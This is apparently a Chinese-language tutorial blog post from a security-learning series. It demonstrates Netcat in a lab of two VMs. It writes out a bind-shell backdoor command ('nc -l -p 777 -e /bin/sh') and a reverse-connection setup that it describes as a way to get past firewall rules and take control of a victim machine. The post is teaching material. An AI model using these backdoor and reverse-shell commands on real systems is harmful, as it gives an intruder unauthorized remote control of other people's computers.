iT邦幫忙

2021 iThome 鐵人賽

DAY 19
0
Security

資安由淺入深系列 第 19

【Day19】維持連線 ─ 工具實作篇(一)

  • 分享至 

  • xImage
  •  

哈囉~
我們前幾天提到,
可以利用網路監聽、密碼破解來取得使用權限,
今天我們要來介紹可以做遠端控制或後門的工具。/images/emoticon/emoticon77.gif

Netcat


即俗稱的nc,具有有網路連線能力。
有兩種執行模式:

  1. 一種為主控模式,可以當Client。
    指令:nc 參數 Host port
  2. 另一種接聽模式,可以當Server。
    指令:nc [-l或-L] [-p PORT] [-s 封包發送位置] 參數

常用參數:

參數 說明
-l 啟動接聽模式(Server)
-d 後台模式。可用於隱藏行蹤
-p 指定埠號
-s 指定封包發送位址
-n 指定IP位址
-w 連線等候時間
-t 使用Telnet
-u 使用UDP
-e 指定連線後執行的程式
-c 指定連線後執行的腳本
-0 輸出hex格式的資料
-v 輸出更詳細的內容
-z 關閉輸入/輸出

簡易的通訊連接

環境準備:
一台VM當Server (192.168.168.129)
一台VM當Client (192.168.168.131)

  1. 首先Server開啟接聽端,監聽來是Port 77的連線。
    nc -ltp 77
    
    簡易通訊demo1
  2. Client使用telnet連線Server,並連接成功。
    telnet [Server IP] [Port]
    
    簡易通訊demo2
  3. 這時Client可以輸入文字,與Server進行應答。
    簡易通訊demo3
  4. 我們會在Server上看到Client傳來的訊息,且Server也可以回傳訊息。
    雙方的輸入皆會直接反映在各自的終端機上。
    簡易通訊demo4

建立簡易的遠端後門

  1. Server在Port 777上等待接聽,連線成功就會執行/bin/sh。

    nc -l -p 777 -e /bin/sh
    

    遠端後門1
    若是Window則使用-e cmd.exe

  2. 此時Client(攻擊者)若執行Port 777,就會取得Server的遠端操作權限。
    遠端後門2
    上面這個例子如果遇到一些公司/機構開啟了防火牆,阻止特定端口對外連線,就會無法實踐。
    若是透過反向連線,就可以避開防火牆的管制。


建立後門反向連線

  1. 若是反過來換攻擊者先執行了接聽模式

    nc -l -p 80
    

    後門反向連線1

  2. Server若有開啟 80 port 向外連線時,就會建立反向連線。

    nc [IP address] 80 
    

    後門反向連線2

  3. 攻擊者收到連線後,就可以操作Server了。
    後門反向連線3


小結

今天示範Netcat(nc)的操作,
雖說這個工具的限制在於要想辦法讓受害端執行nc,
但若受害端執行了nc,攻擊者可以透過nc來遠端操控目標系統的電腦,也能上傳/下載檔案,
也是可見其功能的威力強大呀...畢竟Netcat有個別名叫網路瑞士刀!
其實小妹我有點get不到這個名稱的意思(ºωº)?

走囉! 高歌離席~/images/emoticon/emoticon29.gif


上一篇
【Day18】如何防禦密碼破解
下一篇
【Day20】維持連線 ─ 工具實作篇(二)
系列文
資安由淺入深30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言